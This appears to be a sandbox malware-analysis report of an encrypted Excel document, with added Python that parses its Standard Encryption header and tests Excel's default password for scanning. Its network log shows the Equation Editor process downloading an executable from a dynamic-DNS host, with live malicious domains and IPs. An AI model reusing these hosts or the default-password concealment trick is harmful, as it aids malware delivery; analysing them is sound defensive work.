Data Raw: 08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
General
Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type: data
Stream Size: 200
Entropy: 3.13335930328
Base64 Encoded: False
Data ASCII: X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/Version
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:76
                                                                                                                                                Entropy:2.79079600998
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
Stream Path: EncryptedPackage, File Type: PGP symmetric key encrypted data - Plaintext or unencrypted data, Stream Size: 2458264
General
Stream Path: EncryptedPackage
File Type: PGP symmetric key encrypted data - Plaintext or unencrypted data
Stream Size: 2458264
Entropy: 7.99990874269
Base64 Encoded: True
Data ASCII: . . % . . . . . . . . . . . . . Q . . . . $ . 9 4 ' x . . . . W . D . g l . 5 M . F . . . . . > . . . . > . . M . . . k . W . . [ . . 9 . ? . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . .
Data Raw: 8c 82 25 00 00 00 00 00 b9 ec c5 18 bf 1c 1a c8 51 13 9d d1 05 24 bc 39 34 27 78 20 2e 15 0a aa 57 06 44 d5 67 6c dc 35 4d d2 46 ea ef a8 84 1e 3e 85 f1 fe 90 3e 81 8c 4d ac be e7 6b 8c 57 e8 d9 5b fd aa 39 f3 3f c9 e3 7c 65 83 b7 67 93 08 7a 06 54 e3 a1 c4 c5 ee e3 7c 65 83 b7 67 93 08 7a 06 54 e3 a1 c4 c5 ee e3 7c 65 83 b7 67 93 08 7a 06 54 e3 a1 c4 c5 ee e3 7c 65 83 b7 67 93 08
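The libmagic label on this stream ("PGP symmetric key encrypted data") is a false match on the leading bytes. Given the Standard Encryption header in the EncryptionInfo stream that follows, EncryptedPackage is a little-endian uint64 plaintext length followed by the AES-128-ECB ciphertext of the OOXML zip. Two things are already visible in the 128-byte dump: the length prefix 8c 82 25 00 00 00 00 00 is 2458252, which fits the reported stream size of 2458264 (8 bytes of prefix plus 2458256 bytes of whole AES blocks, 4 of them padding), and the same 16-byte ciphertext block repeats from plaintext offset 64 onwards. ECB has no chaining, so identical plaintext blocks encrypt to identical ciphertext, which is why the "Data ASCII" column shows the same "| e . . g . . z . T" fragment over and over: the package contains a long run of repeated 16-byte content, consistent with junk used to inflate the file. The following added example (not part of the report or of any tool named in it) checks that layout against the reported stream size and counts repeated blocks; the byte string and the size constant are copied from this report, everything else is the example's own.

```python
import struct
from collections import Counter

# First 128 bytes of the EncryptedPackage stream, copied from the report's "Data Raw" column.
ENCRYPTED_PACKAGE_HEAD = bytes.fromhex(
    "8c 82 25 00 00 00 00 00 b9 ec c5 18 bf 1c 1a c8 51 13 9d d1 05 24 bc 39 "
    "34 27 78 20 2e 15 0a aa 57 06 44 d5 67 6c dc 35 4d d2 46 ea ef a8 84 1e "
    "3e 85 f1 fe 90 3e 81 8c 4d ac be e7 6b 8c 57 e8 d9 5b fd aa 39 f3 3f c9 "
    "e3 7c 65 83 b7 67 93 08 7a 06 54 e3 a1 c4 c5 ee e3 7c 65 83 b7 67 93 08 "
    "7a 06 54 e3 a1 c4 c5 ee e3 7c 65 83 b7 67 93 08 7a 06 54 e3 a1 c4 c5 ee "
    "e3 7c 65 83 b7 67 93 08"
)
STREAM_SIZE = 2458264   # "Stream Size" the report gives for EncryptedPackage
AES_BLOCK = 16
SIZE_PREFIX = 8         # uint64 LE plaintext length that precedes the ciphertext


def package_plaintext_size(stream: bytes) -> int:
    """Standard Encryption (MS-OFFCRYPTO 2.3.4.4) stores the unpadded package length first."""
    return struct.unpack_from("<Q", stream, 0)[0]


def layout_is_consistent(stream_head: bytes, stream_size: int) -> bool:
    """True if the stream has the expected shape: 8-byte length, then whole AES blocks that
    cover that length with less than one block of padding."""
    size = package_plaintext_size(stream_head)
    ct_len = stream_size - SIZE_PREFIX
    return ct_len % AES_BLOCK == 0 and 0 <= ct_len - size < AES_BLOCK


def ciphertext_blocks(stream_head: bytes) -> list:
    """Whole 16-byte ciphertext blocks in the dump, skipping the length prefix and any tail."""
    return [stream_head[i:i + AES_BLOCK]
            for i in range(SIZE_PREFIX, len(stream_head) - AES_BLOCK + 1, AES_BLOCK)]


def repeated_blocks(stream_head: bytes) -> dict:
    """Ciphertext blocks seen more than once, keyed by hex, with their counts. Under ECB a
    repeated ciphertext block means the corresponding plaintext blocks are identical."""
    return {b.hex(): n for b, n in Counter(ciphertext_blocks(stream_head)).items() if n > 1}


def first_repeat_plaintext_offset(stream_head: bytes) -> int:
    """Plaintext offset of the first block whose ciphertext also occurs elsewhere, or -1."""
    blocks = ciphertext_blocks(stream_head)
    counts = Counter(blocks)
    for idx, block in enumerate(blocks):
        if counts[block] > 1:
            return idx * AES_BLOCK
    return -1


if __name__ == "__main__":
    print("plaintext size:", package_plaintext_size(ENCRYPTED_PACKAGE_HEAD))
    print("layout consistent with reported stream size:",
          layout_is_consistent(ENCRYPTED_PACKAGE_HEAD, STREAM_SIZE))
    print("repeated ciphertext blocks:", repeated_blocks(ENCRYPTED_PACKAGE_HEAD))
    print("first repeat at plaintext offset:", first_repeat_plaintext_offset(ENCRYPTED_PACKAGE_HEAD))
```

On a full stream rather than this 128-byte head, the ratio of distinct to total blocks is a cheap tell for bulk padding inside an encrypted package: a genuinely compressed zip yields almost no repeated 16-byte blocks.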
Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
General
Stream Path: EncryptionInfo
File Type: data
Stream Size: 224
Entropy: 4.56052515619
Base64 Encoded: False
Data ASCII: . . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . f . ] . . . D . 7 . / & . X . l . . . E I ~ b . . . ! X . A . . . . t < . . . . . . x . . . A . l . . \\ . . @ . . . . . . . . x 6 .
Data Raw: 04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00
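Decoded, the EncryptionInfo bytes say: version 4.2 (Standard Encryption as in ECMA-376; Agile encryption would be version 4.4 with an XML body), header flags 0x24 = fCryptoAPI | fAES, header size 0x8c, AlgID 0x660E = AES-128, AlgIDHash 0x8004 = SHA-1, KeySize 0x80 = 128 bits, ProviderType 0x18 = PROV_RSA_AES, then the UTF-16 CSP name "Microsoft Enhanced RSA and AES Cryptographic Provider". The 72-byte EncryptionVerifier (salt, encrypted verifier, encrypted verifier hash) fills the rest of the 224 bytes but is cut off in the dump. The security point is that Excel silently tries the built-in default password "VelvetSweatshop" before showing any prompt, so a workbook encrypted with that password opens like an ordinary file while its content stays opaque to any scanner that does not decrypt the package. The following added example (not from the report or from any tool it names) parses this header, derives the key from that password with the Standard key schedule (MS-OFFCRYPTO 2.3.4.7: SHA-1 over salt + UTF-16LE password, 50000 spins, block key 0, then the 0x36/0x5C step), and implements the verifier check. Because the report never shows the verifier block, the salt and verifier used by build_example_stream are constructed for the example, and the AES-ECB primitive is passed in as a callable so the block runs with only the standard library; against a real file you would pass pycryptodome's AES.new(key, AES.MODE_ECB).

```python
import hashlib
import struct

# First 128 bytes of the EncryptionInfo stream, copied from the report's "Data Raw" column.
ENCRYPTION_INFO_DUMP = bytes.fromhex(
    "04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 "
    "80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 "
    "6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 "
    "53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 "
    "70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00"
)
# The dump stops mid-name; the rest of the CSP string is readable in the report's "Data ASCII" column.
CSP_NAME_TAIL = "ic Provider\0".encode("utf-16le")
CALG_NAMES = {0x660E: "AES-128", 0x660F: "AES-192", 0x6610: "AES-256", 0x8004: "SHA-1"}
DEFAULT_PASSWORD = "VelvetSweatshop"   # Excel's built-in default, tried before any prompt


def parse_encryption_info(data: bytes) -> dict:
    """Parse a Standard Encryption EncryptionInfo stream (MS-OFFCRYPTO 2.3.4.5 / 2.3.4.6)."""
    major, minor, flags, header_size = struct.unpack_from("<HHII", data, 0)
    hdr = data[12:12 + header_size]
    hflags, size_extra, alg_id, alg_id_hash, key_bits, provider_type = struct.unpack_from("<6I", hdr, 0)
    info = {
        "version": (major, minor), "flags": flags, "key_bits": key_bits, "provider_type": provider_type,
        "cipher": CALG_NAMES.get(alg_id, hex(alg_id)), "hash": CALG_NAMES.get(alg_id_hash, hex(alg_id_hash)),
        "csp_name": hdr[32:].decode("utf-16le").rstrip("\0"),   # two reserved DWORDs precede the name
    }
    ver = data[12 + header_size:]   # EncryptionVerifier, absent if only the dump was given
    if ver:
        salt_size = struct.unpack_from("<I", ver, 0)[0]
        info["salt"] = ver[4:4 + salt_size]
        info["encrypted_verifier"] = ver[4 + salt_size:20 + salt_size]
        info["verifier_hash_size"] = struct.unpack_from("<I", ver, 20 + salt_size)[0]
        info["encrypted_verifier_hash"] = ver[24 + salt_size:]   # 32 bytes for AES (hash rounded up)
    return info


def make_key(password: str, salt: bytes, key_bits: int, spin_count: int = 50000) -> bytes:
    """Standard Encryption key derivation (MS-OFFCRYPTO 2.3.4.7), SHA-1 based."""
    h = hashlib.sha1(salt + password.encode("utf-16le")).digest()
    for i in range(spin_count):
        h = hashlib.sha1(struct.pack("<I", i) + h).digest()
    h_final = hashlib.sha1(h + struct.pack("<I", 0)).digest()       # block key 0
    padded = h_final.ljust(64, b"\0")
    x1 = hashlib.sha1(bytes(b ^ 0x36 for b in padded)).digest()
    x2 = hashlib.sha1(bytes(b ^ 0x5C for b in padded)).digest()
    return (x1 + x2)[:key_bits // 8]


def check_verifier(key: bytes, info: dict, ecb_decrypt) -> bool:
    """Password check (MS-OFFCRYPTO 2.3.4.9): SHA-1 of the decrypted verifier must equal the
    decrypted verifier hash truncated to VerifierHashSize. ecb_decrypt(key, data) is AES-ECB."""
    verifier = ecb_decrypt(key, info["encrypted_verifier"])
    expected = ecb_decrypt(key, info["encrypted_verifier_hash"])[:info["verifier_hash_size"]]
    return hashlib.sha1(verifier).digest() == expected


def decrypt_package(key: bytes, encrypted_package: bytes, ecb_decrypt) -> bytes:
    """EncryptedPackage = uint64 LE plaintext length + AES-ECB ciphertext; returns the zip bytes."""
    size = struct.unpack_from("<Q", encrypted_package, 0)[0]
    return ecb_decrypt(key, encrypted_package[8:])[:size]


def build_example_stream(salt: bytes, verifier: bytes, encrypt) -> bytes:
    """CONSTRUCTED 224-byte stand-in for the full stream: the report's bytes, the completed CSP
    name, and a verifier block in the shape Excel writes, produced with `encrypt(data)`."""
    assert len(salt) == 16 and len(verifier) == 16
    enc_hash = encrypt(hashlib.sha1(verifier).digest().ljust(32, b"\0"))
    return (ENCRYPTION_INFO_DUMP + CSP_NAME_TAIL + struct.pack("<I", 16) + salt
            + encrypt(verifier) + struct.pack("<I", 20) + enc_hash)


if __name__ == "__main__":
    salt, verifier = bytes(range(16)), b"\x41" * 16             # constructed, not from the sample
    key = make_key(DEFAULT_PASSWORD, salt, 128)
    try:
        from Crypto.Cipher import AES                            # pycryptodome, if installed
        encrypt = AES.new(key, AES.MODE_ECB).encrypt
        ecb_decrypt = lambda k, d: AES.new(k, AES.MODE_ECB).decrypt(d)
    except ImportError:                                          # no-op cipher keeps the demo runnable
        encrypt, ecb_decrypt = (lambda d: d), (lambda k, d: d)
    info = parse_encryption_info(build_example_stream(salt, verifier, encrypt))
    print(info["version"], info["cipher"], info["hash"], info["key_bits"], info["csp_name"])
    print("VelvetSweatshop opens it:", check_verifier(key, info, ecb_decrypt))
```

A gateway or sandbox pre-filter can apply exactly this sequence to any OLE2 container that carries EncryptionInfo and EncryptedPackage streams: if check_verifier succeeds with the default password, the document was never meant to be protected from the recipient, only from inspection, and the decrypted package should go through the normal document-analysis path.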

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                             Source Port  Dest Port  Source IP     Dest IP
11/20/20-11:23:46.787297  TCP       2022550  ET TROJAN Possible Malicious Macro DL EXE Feb 2016  49165        80         192.168.2.22  103.125.191.5

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Nov 20, 2020 11:23:46.567594051 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:46.786763906 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:46.786992073 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:46.787297010 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.007692099 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.007766008 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.007797956 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.007819891 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.007997990 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.008752108 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.226994991 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.227062941 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.227113008 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.227163076 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.227211952 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.227252007 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.227262020 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.227289915 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.227308989 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.227329016 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.227365017 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.227371931 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.227514982 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.445997953 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446053028 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446091890 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446130991 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446171045 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446212053 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446297884 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.446327925 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.446331978 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.446343899 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446388960 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446409941 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.446427107 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446475029 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446491003 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.446517944 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446538925 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.446557999 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446576118 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.446599960 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446603060 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.446691036 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446732044 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.446768999 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.447190046 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.452023983 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.452661991 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.665560961 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.665719986 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.665776968 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.665783882 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.665817976 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.665822983 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.665832996 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.665863037 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.665872097 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.665910959 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.665945053 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.665947914 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.665977001 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.665980101 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666009903 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666014910 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666038036 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666048050 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666071892 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666081905 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666105032 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666117907 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666130066 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666160107 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666160107 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666198015 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666212082 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666233063 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666237116 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666268110 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666281939 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666301966 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666320086 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666336060 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666348934 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666371107 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666388988 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666405916 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666420937 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666449070 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666452885 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666487932 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666501045 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666522026 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666527033 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666555882 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666568995 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666590929 CET  80           49165      103.125.191.5  192.168.2.22
Nov 20, 2020 11:23:47.666610956 CET  49165        80         192.168.2.22   103.125.191.5
Nov 20, 2020 11:23:47.666625023 CET  80           49165      103.125.191.5  192.168.2.22

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Nov 20, 2020 11:23:46.500763893 CET  52197        53         192.168.2.22  8.8.8.8
Nov 20, 2020 11:23:46.550245047 CET  53           52197      8.8.8.8       192.168.2.22
Nov 20, 2020 11:24:55.833583117 CET  53099        53         192.168.2.22  8.8.8.8
Nov 20, 2020 11:24:55.879791975 CET  53           53099      8.8.8.8       192.168.2.22
Nov 20, 2020 11:25:16.152932882 CET  52838        53         192.168.2.22  8.8.8.8
Nov 20, 2020 11:25:16.491955996 CET  53           52838      8.8.8.8       192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 20, 2020 11:23:46.500763893 CET | 192.168.2.22 | 8.8.8.8 | 0x8ac6 | Standard query (0) | workfinethdysanotherrainbowlomoyentthghf.ydns.eu | A (IP address) | IN (0x0001)
Nov 20, 2020 11:24:55.833583117 CET | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.pestigenix.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:25:16.152932882 CET | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.atlanticdentallab.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 20, 2020 11:23:46.550245047 CET | 8.8.8.8 | 192.168.2.22 | 0x8ac6 | No error (0) | workfinethdysanotherrainbowlomoyentthghf.ydns.eu | | 103.125.191.5 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:24:55.879791975 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.pestigenix.com | | 91.195.241.137 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:25:16.491955996 CET | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.atlanticdentallab.com | | 180.215.92.80 | A (IP address) | IN (0x0001)

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • workfinethdysanotherrainbowlomoyentthghf.ydns.eu
                                                                                                                                                • www.pestigenix.com
                                                                                                                                                • www.atlanticdentallab.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 103.125.191.5 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:23:46.787297010 CET | 0 | OUT | GET /worksdoc/svchost.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
Connection: Keep-Alive
Nov 20, 2020 11:23:47.007692099 CET | 2 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Nov 2020 10:23:44 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
Last-Modified: Thu, 19 Nov 2020 21:43:46 GMT
ETag: "92600-5b47c9f64afa6"
Accept-Ranges: bytes
Content-Length: 599552
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 e7 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 1e 09 00 00 06 00 00 00 00 00 00 de 3d 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 55 96 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 3d 09 00 4f 00 00 00 00 40 09 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 1d 09 00 00 20 00 00 00 1e 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 40 09 00 00 04 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3d 09 00 00 00 00 00 48 00 00 00 02 00 05 00 88 9d 08 00 04 a0 00 00 